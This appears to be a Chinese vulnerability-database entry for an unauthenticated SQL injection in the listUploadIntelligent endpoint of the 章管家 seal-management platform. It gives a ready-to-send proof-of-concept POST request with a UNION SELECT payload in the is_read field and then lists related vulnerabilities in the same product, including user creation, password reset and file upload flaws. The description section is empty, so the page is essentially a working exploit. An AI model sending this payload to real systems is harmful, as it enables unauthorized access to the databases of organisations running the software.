上海建业信息科技 章管家 listUploadIntelligent 未授权 SQL注入漏洞

漏洞描述

PoC代码

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

person_id=1&unit_id=1&pageNo=1&is_read=-1 union select md5(1),2,3,4,5,6,7,8,9,10,11,12 --

相关漏洞推荐

• 章管家 /api/personSeal/UserCreateService 权限绕过漏洞
• 章管家 /api/personSeal_jdy/saveUser.htm 未授权访问漏洞
• 章管家 /listUploadIntelligent.htm SQL 注入漏洞
• 上海建业信息科技 章管家 updatePwd.htm 身份验证错误漏洞
• 章管家印章智慧管理平台 list.htm SQL注入漏洞
• 章管家 listUploadIntelligent SQL注入漏洞
• 章管家 updatePwd 任意账号密码重置漏洞
• POC 章管家listUploadIntelligent接口存在sql注入漏洞
• 章管家印章智慧管理平台 listUploadIntelligent SQL注入漏洞
• 上海建业信息科技 章管家 saveUser.htm 未授权 任意用户创建漏洞
• 上海建业信息科技 章管家 uploadFileByChunks.htm 需授权 任意文件上传漏洞
• 章管家印章智慧管理平台 saveUser 任意用户创建漏洞
• 章管家 saveUser存在任意用户创建漏洞